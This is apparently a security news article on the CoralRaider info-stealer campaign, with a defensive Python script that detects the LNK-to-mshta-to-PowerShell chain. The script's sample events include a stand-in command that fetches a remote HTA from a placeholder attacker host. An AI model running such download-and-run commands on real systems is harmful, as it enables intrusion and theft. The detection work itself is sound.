Beware! CoralRaider Steals Your Financial Data

According to a recent report by Cisco Talos, Vietnamese hackers have been distributing a new information stealer designed to harvest financial data since May 2023. The campaign, dubbed CoralRaider, has targeted victims in India, China, South Korea, Bangladesh, Pakistan, Indonesia, and Vietnam.

The attackers’ primary objective is the theft of users’ credentials, financial information, and social media accounts, including accounts used for business and advertising. To achieve this, they rely on RotBot (a modified variant of the Quasar RAT) and the XClient info-stealer. Their arsenal also includes AsyncRAT, NetSupport RAT, and Rhadamanthys.

Business and advertising accounts receive particular attention: once acquired through Ducktail and NodeStealer, these accounts are monetized by the cybercriminals. Data from victims’ computers is exfiltrated via Telegram and sold on the black market.

The attack chain begins with the distribution of an LNK shortcut; researchers have not yet determined exactly how these shortcuts reach victims’ computers. Opening the LNK file triggers the download and execution of an HTML Application (HTA) from the attackers’ server. The HTA in turn launches scripts that disable security tools and download RotBot.

RotBot establishes communication with a Telegram bot, delivers the XClient info-stealer, and executes it in memory. XClient then captures screenshots and steals cookies, credentials, and financial information from various browsers, as well as from Discord and Telegram.
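The shortcut-to-HTA-to-script chain described in the two paragraphs above leaves a recognizable process lineage on the endpoint: explorer.exe (the shortcut launch) spawning mshta.exe with a remote URL, and mshta.exe in turn spawning a script host. The following detection pass is an added example written for this article, not code from Cisco Talos or from the CoralRaider tooling. It assumes Sysmon-style process-creation events with pid, parent pid, image name and command line; the events, the `attacker.invalid` hostname and the file names are constructed for illustration and are not real CoralRaider indicators.

```python
"""Detect the LNK -> mshta.exe (remote HTA) -> script host lineage over
process-creation events. All sample events below are constructed."""
from dataclasses import dataclass
import re

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # basename of the executable
    cmdline: str    # full command line as logged

# Script interpreters an HTA typically hands off to (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)

def detect_hta_chain(events):
    """Return (pid, reason) findings for every suspicious link in the chain.
    Rule 1: mshta.exe launched with a remote URL (HTA fetched from a server).
    Rule 2: a script host whose parent is mshta.exe."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if e.image.lower() == "mshta.exe" and REMOTE_RE.search(e.cmdline):
            reason = "mshta.exe fetching a remote HTA"
            if parent and parent.image.lower() == "explorer.exe":
                reason += " (launched from explorer.exe, consistent with a shortcut)"
            findings.append((e.pid, reason))
        if e.image.lower() in SCRIPT_HOSTS and parent and parent.image.lower() == "mshta.exe":
            findings.append((e.pid, f"{e.image} spawned by mshta.exe"))
    return findings

def chain_complete(events):
    """True when a remote-HTA mshta.exe process also has a script-host child,
    i.e. both stages of the lineage are present, which merits an alert."""
    flagged = {pid for pid, reason in detect_hta_chain(events)}
    by_pid = {e.pid: e for e in events}
    for e in events:
        parent = by_pid.get(e.ppid)
        if parent and parent.pid in flagged and e.pid in flagged and parent.image.lower() == "mshta.exe":
            return True
    return False

# Constructed sample events (hostname and paths are placeholders).
SAMPLE = [
    ProcEvent(100, 1,   "explorer.exe",   "C:\\Windows\\explorer.exe"),
    ProcEvent(200, 100, "mshta.exe",      "mshta.exe http://attacker.invalid/loader.hta"),
    ProcEvent(300, 200, "powershell.exe", "powershell.exe -NoProfile -File stage2.ps1"),
    ProcEvent(400, 100, "chrome.exe",     "chrome.exe https://example.com"),
    ProcEvent(500, 100, "mshta.exe",      "mshta.exe C:\\Users\\user\\local.hta"),
]

if __name__ == "__main__":
    for pid, reason in detect_hta_chain(SAMPLE):
        print(f"pid {pid}: {reason}")
    print("full chain observed:", chain_complete(SAMPLE))
```

Only the remote-HTA process and its PowerShell child are flagged; the browser visiting a URL and the locally opened HTA are not, which keeps the rule usable on real telemetry where mshta.exe has legitimate local uses.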

XClient also exfiltrates data from victims’ accounts on Facebook, Instagram, TikTok, and YouTube, collecting detailed information about payment methods and permissions associated with Facebook business and advertising accounts.

Researchers assess that the operators of CoralRaider are based in Vietnam, citing messages in their Telegram channels and a preference for the Vietnamese language in bot names and in the malware’s code.